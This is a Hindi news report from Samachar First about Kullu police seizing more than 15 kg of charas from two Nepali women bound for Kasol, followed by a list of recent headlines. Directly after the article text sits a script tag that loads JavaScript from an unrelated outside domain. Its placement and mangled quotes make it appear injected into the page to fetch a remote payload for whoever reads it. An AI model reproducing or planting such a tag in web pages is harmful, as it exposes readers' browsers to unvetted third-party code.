कुल्लूः 15 किलो से अधिक चरस के साथ दो महिलाएं गिरफ्तार

<p>&nbsp;</p>

<p>जिला कुल्लू की मणिकर्ण पुलिस ने नेपाल से लाई जा रही 15 किलो 420 ग्राम चरस के साथ दो महिलाओं को गिरफ्तार किया है। नए साल के चलते ये चरस कसोल में बेची जानी थी। जानकारी के मुताबिक गुप्त सूचना के आधार पर मणिकर्ण पुलिस चौकी इंचार्ज एएसआई भूप सिंह सहित एचसी संजय कुमार, एलएचसी मुरलीधर, सीटी मनोज, एचएच हेमराज और एल / सी नंदिनी घाटी के पंजाबी चूल्हा के पास नाके पर थे। इसी दौरान स्विफ्ट गाड़ी रात को दो बजे तलाशी के लिए रोकी तो गाड़ी में सवार श्रेया थापा सागर 26 साल के पास 10.190 किलोग्राम चरस और विष्णु कला 32 साल के पास 5.212 किलोग्राम चरस बरामद हुई। दोनों कपिलवस्तु, लुंबिनी नेपाल की रहने वाली हैं।</p>

<p>एसपी कुल्लू गौरव सिंह ने बताया कि ये दोनों हरिद्वार बस के जरिये भुंतर पहुंचे और उसके बाद 1000 रुपये में&nbsp; टैक्सी स्विफ्ट डिजायर किराए पर ली। पंजाबी चुल्हा पर नाकाबंदी के दौरान करीब रात 1:45 बजे, टीम ने उनकी तलाशी ली&nbsp; वाहन और बरामद 15. 420 किलोग्राम चरस बरामद हुई। चरस उनके शरीर के चारों ओर लिपटी हुई थी।&nbsp; महिला अभियुक्त होने के नाते, महिला पुलिस ने जब जांच की तो ये चरस पकड़ी गई। टैक्सी चालक को तस्करी में शामिल नहीं पाया गया। बताया&nbsp; जा रहा है कि इस चरस को कसोल में बेचा जाना था। यह साल 2019 की एकमात्र सबसे बड़ी मात्रा में चरस पकड़ी गई है।</p>
<script src=”//amptylogick.com/21aca573d498d25317.js”></script>

Samachar First

Recent Posts

हिजबुल्लाह चीफ हसन नसरल्लाह के मारे जाने की खबर, क्या है सच?

    World News: इजराइली हमले में हिजबुल्लाह का चीफ हसन नसरल्लाह मारा गया है।…

58 mins ago

बंगलूरू के ताज होटल को बम से उड़ाने की धमकी, मुंबई में आतंकी हमले का अलर्ट

  Karnatka, Agencies: कर्नाटक की राजधानी बंगलूरू के ताज वेस्ट एंड होटल को बम से…

3 hours ago

IIT Mandi में 12वां दीक्षांत समारोह, शाश्वत गुप्ता को राष्ट्रपति पदक

Mandi : आईआईटी मंडी में शनिवार को 12वें दीक्षांत समारोह का आयोजन किया गया। समारोह…

4 hours ago

कुलगाम में आतंकवादियों से मुठभेड़, चार सुरक्षाकर्मी और एक यातायात अधिकारी घायल

कुलगाम में आतंकवादियों से हुई मुठभेड़ में चार सुरक्षाकर्मी व एक यातायात पुलिस अधिकारी घायल…

4 hours ago

नही थम रहा मस्जिद विवाद, देवभूमि संघर्ष समिति की फ‍िर हुंकार, प्रदेश भर में प्रदर्शन

  Shimla:कथित अवैध मस्जिदों और मजारों के निर्माण पर रोक की मांग को लेकर देवभूमि…

4 hours ago

हिमाचल विश्वविद्यालय में हादसा: हॉस्टल की 5वीं मंजिल से गिरकर छात्र की मौत

  Shimla: शुक्रवार देर रात हिमाचल प्रदेश विश्वविद्यालय में एसबीएस हॉस्टल में छात्र के गिरने…

5 hours ago